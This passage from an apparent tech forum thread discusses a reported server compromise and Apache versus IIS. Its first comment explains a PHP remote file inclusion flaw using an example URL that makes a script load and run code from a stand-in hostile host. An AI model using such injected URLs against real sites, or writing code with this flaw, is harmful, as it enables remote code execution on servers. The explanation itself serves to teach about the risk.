Now imagine what would happen if an attacker browsed to 'http://somesite.com/yourscript.php?page=http://badsite.com/evilvirus'. The poorly written script was just intended to load local files, but if url fopen() is enabled (and it is by default) the above attack would execute whatever php code was hosted at http://badsite.com/evilvirus. It's just incompetence more than anything else, but the problem is PHP makes doing bad things like this so damn easy.

Re:Ubuntu as well?

[budgenator]

once upon a time I was the webmaster for poiuyt.com and it's amazing how many lost passwords went to qwerty@poiuyt.com!

Re:Ubuntu as well?

[Skrynesaver]

Fair point ;)
There was a provisional Mind Control command (mc) in an early manual I read, however I couldn't get it to work :p

Tisk tisk, bad admins

[jantman]

I can't seem to find any mentions of someone figuring out exactly what this exploit/problem/etc. is. Seems really weird. I mean, *someone* has to have an infected machine that can be looked at. And what about SysAdmins doing something to at least perform post-compromise analysis? Even my *personal* webserver logs over syslog-ng to an append-only filesystem, and Bacula runs nightly MD5sums of pretty much the whole FS (not to mention remotely downloading the bacula binary every night and MD5summing that). At the very least, someone should be able to verify the technical details.

Something here reeks of FUD....

"GUIs provide metaphors for users, they have no place in administration." - GREAT quote.

And as to IIS/Apache/whatever else... telling people to use IIS when a problem is found that may involve Apache is as stupid as telling IIS people to use Apache when (another) IIS bug is found. Software is buggy. When the likes of Amazon, Google, etc. use Apache (or base their servers on it), I think it can be considered stable enough for production use. All software has flaws. That's a fact of life. Telling people to use a different package becaause of one bug is as narrow-minded as telling people to sell their Hondas/Fords/Chevys/Toyotas because you saw one in the shop.